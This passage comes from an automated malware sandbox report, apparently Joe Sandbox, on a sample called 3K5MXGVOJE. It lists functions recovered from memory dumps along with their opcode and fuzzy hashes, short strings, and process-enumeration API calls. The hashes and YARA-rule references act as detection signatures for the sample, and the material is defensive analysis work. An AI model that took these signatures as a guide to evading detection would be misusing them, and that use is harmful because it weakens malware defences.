                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 28b85a592f4ebbdfe08ce608cc493ebeb85eebab15ac7094635aa5b9497c04c6
                                        • Instruction ID: 1182569b1bd2567ecabfb75f478c616976273862ba3338c1eb63a22200e85d38
                                        • Opcode Fuzzy Hash: 28b85a592f4ebbdfe08ce608cc493ebeb85eebab15ac7094635aa5b9497c04c6
                                        • Instruction Fuzzy Hash: 9B618D71B107088FDB18DEAEC8D069EB6F3AB88204B54817DE50AEB752EF749C05DB40
                                        Function 06C74300 Relevance: .2, Instructions: 183COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 816c3744b97df26fbc555da5b2456e0948c43cee3c092aa35bc8c9e764b024ee
                                        • Instruction ID: 4b394329f7398b1e5acbdc597d3da96865bc5b4ceee17902dddd77d7a64be417
                                        • Opcode Fuzzy Hash: 816c3744b97df26fbc555da5b2456e0948c43cee3c092aa35bc8c9e764b024ee
                                        • Instruction Fuzzy Hash: E9614C75E101148FC788CFA8D980999F7F2FB88714B5AC569E809EB355DB31ED42CB90
                                        Function 05A0DB40 Relevance: .2, Instructions: 175COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd387174181eb9c3dd73b334b02f5bcf703406b49819df9200c1892dd79dfaaf
                                        • Instruction ID: da7db769b58aba925bf3b008a30bfda51f7c1c10500a6ec568de64f7fb0b2ebf
                                        • Opcode Fuzzy Hash: dd387174181eb9c3dd73b334b02f5bcf703406b49819df9200c1892dd79dfaaf
                                        • Instruction Fuzzy Hash: 5351C476E112159FCB44DFA8D8509AAFBF2FB88310B19856AE809E7351D735ED02CBD0
                                        Function 06C73C00 Relevance: .2, Instructions: 171COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ddb01bda2dc788830452ab6c763f63b9718a703d8b1bc483469503e9f918151
                                        • Instruction ID: 7e3711558f096fefd7ca5be9974213a101a998e727b0bcb08e97dd6296ea7f7d
                                        • Opcode Fuzzy Hash: 2ddb01bda2dc788830452ab6c763f63b9718a703d8b1bc483469503e9f918151
                                        • Instruction Fuzzy Hash: 8851F576F002249FD754DFA8D89099EF7F2BB88210705856EE81AE7351DB34AD06CBD0
                                        Function 06C73BF0 Relevance: .2, Instructions: 158COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af9d0f1a70622283bfb99e142549ecfa0c3cf3085b6af853ca84d039b9f19a8a
                                        • Instruction ID: b9677cbfb4776363cc9058623f9b02580bc2faf53fdfddcc4bd5c218c5a9203e
                                        • Opcode Fuzzy Hash: af9d0f1a70622283bfb99e142549ecfa0c3cf3085b6af853ca84d039b9f19a8a
                                        • Instruction Fuzzy Hash: 8851D476F011289FDB54DFA8D89099EF7F2BB88350745862AE81AE7351DB30AD05CBD0
                                        Function 02B49BBB Relevance: .1, Instructions: 147COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 90927b90c73e2b32ee24b4ecab2e0281694da50460fecc3e26ac4a605d73cf34
                                        • Instruction ID: 165bc37ca58e7a535c60d22b0ac43d92ab0c5bbc7d5dd6933c66177b91f95417
                                        • Opcode Fuzzy Hash: 90927b90c73e2b32ee24b4ecab2e0281694da50460fecc3e26ac4a605d73cf34
                                        • Instruction Fuzzy Hash: AE51A175B107048FDB18DEAEC9D069DB2E3AF88204B54817DE50ADB756EB749C05DB00
                                        Function 05A0DB30 Relevance: .1, Instructions: 138COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4bcdc8256ad89207cb64cb7c795588b2f2315a73f16bf9037967ee01c046e189
                                        • Instruction ID: 314eb05486f85b35a18a28145ec22e461cd16b16fe1920761e75e680a2ac3e2f
                                        • Opcode Fuzzy Hash: 4bcdc8256ad89207cb64cb7c795588b2f2315a73f16bf9037967ee01c046e189
                                        • Instruction Fuzzy Hash: D0515E76E111299FCB44DFA8D9809ADF7F2FB88320B198169EC09E7341D731AD52CB90
                                        Function 051A15A8 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LlIq$LlIq
                                        • API String ID: 0-3941684836
                                        • Opcode ID: 43ea998bbcadfefb7401ffb21088b340196bfc9fc6dc5ffcab23363160802803
                                        • Instruction ID: 5d504a3352728ece8c7574d718201905c4df9a251f63c879d59141a541f9726e
                                        • Opcode Fuzzy Hash: 43ea998bbcadfefb7401ffb21088b340196bfc9fc6dc5ffcab23363160802803
                                        • Instruction Fuzzy Hash: 3C11017AF0421AABA73A9D6D981057B73B6BFC5511B25442BC80687204DF719801C7AA
                                        Function 051A1698 Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: tmIq$tmIq
                                        • API String ID: 0-2280623689
                                        • Opcode ID: b8becc84d51f01b938937e4def69833cb491a825fc4547404238fec8d742d22f
                                        • Instruction ID: 2752dd7bf9c16b5b9982c5a82a89c0c64e4a88a7750a165a232c041fed7deaeb
                                        • Opcode Fuzzy Hash: b8becc84d51f01b938937e4def69833cb491a825fc4547404238fec8d742d22f
                                        • Instruction Fuzzy Hash: B001F53A74D7816BD727576C98206226F736FC2910B7E05BBC085CB256CBB08C46C76A
                                        Function 05DFE044 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                        Download Yara Rule
                                        APIs
                                        • Process32First.KERNEL32(00000014,?), ref: 05DFE136
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID:
                                        • API String ID: 2623510744-0
                                        • Opcode ID: 289804012720d898401bbf84e8e9baede411278e260d39c09e3aa0ccdbf1e9eb
                                        • Instruction ID: c44fbb4a4e297d341964aec62ef9408b6d53a70e03f6f80bad46c0e7ecc2564b
                                        • Opcode Fuzzy Hash: 289804012720d898401bbf84e8e9baede411278e260d39c09e3aa0ccdbf1e9eb
                                        • Instruction Fuzzy Hash: D6411570D052289FEB60CF6AC884BDABBB9FF49304F9184DAD50CA7250DB705A89CF50
                                        Function 05DFA374 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                        Download Yara Rule
                                        APIs
                                        • Process32First.KERNEL32(00000014,?), ref: 05DFE136
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID:
                                        • API String ID: 2623510744-0
                                        • Opcode ID: 3a463ed775c03c1313a602eab41215b1a2caf277af685e6a4e9944b1fa320b26
                                        • Instruction ID: bc7155f0a7069a8bb06da012ba3a4bc09dab6b3932fe5680b89c7acb96c205bd
                                        • Opcode Fuzzy Hash: 3a463ed775c03c1313a602eab41215b1a2caf277af685e6a4e9944b1fa320b26
                                        • Instruction Fuzzy Hash: 2E41F670D052289FEB60CF6AC884BDABBB9EF49304F9184DAD50CA7250DB745E85CF90
                                        Function 05DFA368 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                        Download Yara Rule
                                        APIs
                                        • Process32First.KERNEL32(00000014,?), ref: 05DFE136
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID:
                                        • API String ID: 2623510744-0
                                        • Opcode ID: 00340cfd31e6065f72410a7631d371cc7b80182f16eafe46cde6d390885ff16a
                                        • Instruction ID: 3afa1bd6c42d47aa8d50fc8ad8bee0d5183f401dffcdd9f33359d37e8e411242
                                        • Opcode Fuzzy Hash: 00340cfd31e6065f72410a7631d371cc7b80182f16eafe46cde6d390885ff16a
                                        • Instruction Fuzzy Hash: E241F670D052289FEB60CF69C884BDABBB9EF49304F9184DAD50CA7250DB745E85CF50
                                        Function 05DFA35C Relevance: 1.5, APIs: 1, Instructions: 48processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 05DFE012
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: CreateSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3332741929-0
                                        • Opcode ID: 0e9fab0361468b270fcf970a1201bfa5b14a84f6c956f43c46816839cccdcde9
                                        • Instruction ID: e3b2d9fe73b224a1debedccc23e29449f55c62e54738862b6bf6397a9c2b3540
                                        • Opcode Fuzzy Hash: 0e9fab0361468b270fcf970a1201bfa5b14a84f6c956f43c46816839cccdcde9
                                        • Instruction Fuzzy Hash: D31133B19003499FDB20DF9AD884B9EFBF8EB49310F20881AD518A7350C374A944CFA5
                                        Function 05A0060A Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 7c0
                                        • API String ID: 0-4063725905
                                        • Opcode ID: bfcbd827069d42f32c32041ca377b8ef720bad686b4ce3cc2717415ad9b13fcc
                                        • Instruction ID: 1cb678ad6bc52910dfe3883c7fee1275959b6eab5f3fc96c1e4681b7ae74455b
                                        • Opcode Fuzzy Hash: bfcbd827069d42f32c32041ca377b8ef720bad686b4ce3cc2717415ad9b13fcc
                                        • Instruction Fuzzy Hash: D421C33BF111249F9B04DFADE88899DF7E2BBC8310B56816AE815E7355CB70DD028B80
                                        Function 051A158C Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LlIq
                                        • API String ID: 0-3086139195
                                        • Opcode ID: 4c7150008da26d22c708d59149895ae7d4fdb5b5af4110c18e96262ea634e84e
                                        • Instruction ID: 0b359228c3f7dbc65f9b45337d940beaab58a7bd9a8d1ef308ed426976e383fd
                                        • Opcode Fuzzy Hash: 4c7150008da26d22c708d59149895ae7d4fdb5b5af4110c18e96262ea634e84e
                                        • Instruction Fuzzy Hash: 491184BB948345AFCB378F28E9005AA3B75FFC2221F1A406BD40697211D7308841CB2A
                                        Function 02B4D939 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6i-8
                                        • API String ID: 0-3140119231
                                        • Opcode ID: 491a6c7355147e3596a2c8726c0db46595f188a6d23ef63eec0f004f1c4c60c0
                                        • Instruction ID: d8203f518dc3a53f75526382059fbf71d0d2ca1d9005033f206da2618363d44b
                                        • Opcode Fuzzy Hash: 491a6c7355147e3596a2c8726c0db46595f188a6d23ef63eec0f004f1c4c60c0
                                        • Instruction Fuzzy Hash: C701B172B086258FC7149B38DC9495A7BB6FF9522531902AEE805EB7A1DB32DC41CBD0
                                        Function 02B4D948 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6i-8
                                        • API String ID: 0-3140119231
                                        • Opcode ID: 2170bc9cae5b4b68c3049cb1b6afff540201c4dbfbe8120745163f5f48762696
                                        • Instruction ID: f45780d7dc3b315c3c374caea0b38318d9a31a9455153b475fef3448693c9d7c
                                        • Opcode Fuzzy Hash: 2170bc9cae5b4b68c3049cb1b6afff540201c4dbfbe8120745163f5f48762696
                                        • Instruction Fuzzy Hash: 1F01A232B042258FC714AA29DC8481A77B6FF94215315016EE905EB350DB32EC41CBD0
                                        Function 051A0DC0 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4qIq
                                        • API String ID: 0-226953067
                                        • Opcode ID: ab0be98c19143d76161895e3ad8df71a80ffcd997b0cdf59548743611cbf7544
                                        • Instruction ID: ef1d1c37ef99173ad73f44aafcb031708a3538689e0070d3954bb57796596089
                                        • Opcode Fuzzy Hash: ab0be98c19143d76161895e3ad8df71a80ffcd997b0cdf59548743611cbf7544
                                        • Instruction Fuzzy Hash: D4F044AA20F3C00FC30747786C246567F708F87210B0A14EBE1C1DB2B3D4284849C73A
                                        Function 051A101E Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LlIq
                                        • API String ID: 0-3086139195
                                        • Opcode ID: 460c3ca5e41f9f97de5152013f53dbbeab0bb96831fd1bb60fa0fc0227d28132
                                        • Instruction ID: 62152211a7a436eb6b31f860e71bf914865fc17fa69de6955bcbbf4174a44263
                                        • Opcode Fuzzy Hash: 460c3ca5e41f9f97de5152013f53dbbeab0bb96831fd1bb60fa0fc0227d28132
                                        • Instruction Fuzzy Hash: BED02B3B7C819117453F545D288043EB283BBC4650B290827D2058B317CF29CC81C355
                                        Function 02B408B0 Relevance: .5, Instructions: 541COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 667402a7dcb1419a6a14fb81a4b9c92a03c3c0c8f5e17099c0ed29d7d51555be
                                        • Instruction ID: 3a791bef7d22f6377648e45e097f0214fce0afb54f77885f478a9a3bd809825e
                                        • Opcode Fuzzy Hash: 667402a7dcb1419a6a14fb81a4b9c92a03c3c0c8f5e17099c0ed29d7d51555be
                                        • Instruction Fuzzy Hash: 7F02005250E3C25FE30B57344CBA19A7FB0AE6B15970E46EBC5C4CB4B3EA18581AD363
                                        Function 06C73709 Relevance: .2, Instructions: 227COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b55e2fe5d000f6052f7b0da12226536dffa54fe75d2ab8796dfc33df3c82709e
                                        • Instruction ID: a6a40a6aa69890ee3958ca5f5ce126f2e25a986466a1c164ac01a5a9611acd98
                                        • Opcode Fuzzy Hash: b55e2fe5d000f6052f7b0da12226536dffa54fe75d2ab8796dfc33df3c82709e
                                        • Instruction Fuzzy Hash: 2671C536E002648FCB94DFA8C98499DBBF1AF84310B16856ED80AEF355DB359D05DBC0
                                        Function 06C73869 Relevance: .2, Instructions: 222COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66308f30b9c87e8e25e13486fddc72c8c4d7472229212fddcb5ebd933e5a5dbc
                                        • Instruction ID: 38665a89903a9ea8c40b4b853d44da49a9e7cef11799e558ae5e2f6eccb47b73
                                        • Opcode Fuzzy Hash: 66308f30b9c87e8e25e13486fddc72c8c4d7472229212fddcb5ebd933e5a5dbc
                                        • Instruction Fuzzy Hash: 1D610636E002648FDB54DFA8C98456DBBF2AF88310B168469DC0AEB385DB75DD06DBC0
                                        Function 06C7A7A8 Relevance: .2, Instructions: 204COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3734b6928fa4e3d02f51d94dbc344881aa33f7c9985b142821c0b1c2e3769958
                                        • Instruction ID: 8a602c9975c5567d0c7bbec4be38acda879ae3907a8e81e6754b299a20a8b1cc
                                        • Opcode Fuzzy Hash: 3734b6928fa4e3d02f51d94dbc344881aa33f7c9985b142821c0b1c2e3769958
                                        • Instruction Fuzzy Hash: 2171D436B002149FC354DF68D88496AB7F6FF88214756857EE819DB392DB31ED02CB90
                                        Function 051A0A2D Relevance: .2, Instructions: 198COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d61ca8a4f24f28cc4431d3216357733177afe6c0e0914b9b1b5b9bb48c1c7708
                                        • Instruction ID: 560b1c15b4ba647e816ecafe788a0c437f8821ac5a9cd8543d905adb1d45bc28
                                        • Opcode Fuzzy Hash: d61ca8a4f24f28cc4431d3216357733177afe6c0e0914b9b1b5b9bb48c1c7708
                                        • Instruction Fuzzy Hash: 24615C6EA0E3C04FD72B9B7869643A53F737F8A220B6945E7C0418B267D7318845D751
                                        Function 05A00BF9 Relevance: .1, Instructions: 137COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 238107d15d90a14bf65e1b2c6df350ee825dce314ed3398bf7d3908213977a05
                                        • Instruction ID: 67f753cae862ef97bb5fe3dd1fec4bf8c20a35bcc9a9995d9d5d19452ed07b50
                                        • Opcode Fuzzy Hash: 238107d15d90a14bf65e1b2c6df350ee825dce314ed3398bf7d3908213977a05
                                        • Instruction Fuzzy Hash: 3B41C135B101149FCB04DF6DD895A9AB7F6BF89310B6AC569E809EB351DB31EC42CB80
                                        Function 02B40B60 Relevance: .1, Instructions: 130COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4edffba2285fa09fddb19e9ce0750448735e03dd30a326e5db0bbe84c3c0754c
                                        • Instruction ID: 21ee1f1a50646f98acf4230b2a9160452c5a9622bb6ae3aa1dc8b7e8f2eed6f7
                                        • Opcode Fuzzy Hash: 4edffba2285fa09fddb19e9ce0750448735e03dd30a326e5db0bbe84c3c0754c
                                        • Instruction Fuzzy Hash: 4B41AB6160E3C19FD3079B389CB658A7FB0EE5B11470A44EBC5C4CF5A3DA2D880AD762
                                        Function 02B48A80 Relevance: .1, Instructions: 129COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21cba3e5e1af17747845fcf33e7a8a39c8f8ccaee03b7927582a68eb82352418
                                        • Instruction ID: a777dfc58ec013befcb4c255feb6e76d9ff89464b6512e62d1f97f5ca30ce883
                                        • Opcode Fuzzy Hash: 21cba3e5e1af17747845fcf33e7a8a39c8f8ccaee03b7927582a68eb82352418
                                        • Instruction Fuzzy Hash: 52515E74B01309CFCB18DF68D8D495DBBB2AF89314B1441A9E506AB361DB71EC82DF41
                                        Function 06C79720 Relevance: .1, Instructions: 120COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce23756996c12f40dfdefa5d626514a0e0999725ea840c32beeae82509a8d69a
                                        • Instruction ID: 358773618e649b47718ca4ee93c6076d37d893f7b8a3c9858ee0e9d4a1069ca9
                                        • Opcode Fuzzy Hash: ce23756996c12f40dfdefa5d626514a0e0999725ea840c32beeae82509a8d69a
                                        • Instruction Fuzzy Hash: 3941C176E102189FCB04DF68D9949DDFBB6AB88310F06856BE816FB341DB709D06CB90
                                        Function 06C73E58 Relevance: .1, Instructions: 119COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 354d0be945ae7d8f04117e0e4cdcce3907c5d44c15b55a9f9939ba41a5ec2505
                                        • Instruction ID: af2dbc3fb3e0d024cc84690755cbb488efb05a591ddaaa4e8b143d54a2e0e333
                                        • Opcode Fuzzy Hash: 354d0be945ae7d8f04117e0e4cdcce3907c5d44c15b55a9f9939ba41a5ec2505
                                        • Instruction Fuzzy Hash: BE416C39B001158FD744DF59C985A5AFBF6AFC4750B2AC4AAE809EB351CB31ED02CB94
                                        Function 06C7ADD2 Relevance: .1, Instructions: 115COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37628c5f3cba35585ada75a96102a9190ffead920353507711ca21bf09e62cb1
                                        • Instruction ID: 020bfd597686f40919de68dcf3f16ca75f716f05bb4b7e013e931bea8bbeb0b4
                                        • Opcode Fuzzy Hash: 37628c5f3cba35585ada75a96102a9190ffead920353507711ca21bf09e62cb1
                                        • Instruction Fuzzy Hash: C341D436F141289F8759EBA8D49446DB7A3BF8431435AC56AE806EF395DA34DD02CBC0
                                        Function 06C7A500 Relevance: .1, Instructions: 115COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0166ccff6f28b947a7282ff5a7755a71989ce48b279de4d61b12b9a0bd447f48
                                        • Instruction ID: d5b2856234968ee412c00f01901b5e104433417eebedf00a3eef87915976bf5d
                                        • Opcode Fuzzy Hash: 0166ccff6f28b947a7282ff5a7755a71989ce48b279de4d61b12b9a0bd447f48
                                        • Instruction Fuzzy Hash: 8C415B71D002489FDB10CFA9D980BEDBBF1AF48704F248469E409AB350DB349A46CB60
                                        Function 02B4D178 Relevance: .1, Instructions: 114COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c6f5c1e7f62884f02c82e6e5985f9984626cab3017f045c83fa0c9357d0c8cb
                                        • Instruction ID: 2026760aa6a846d1e8e39a27836a80b6d02aef5dc7c9d6d4030b77676d8ebeb3
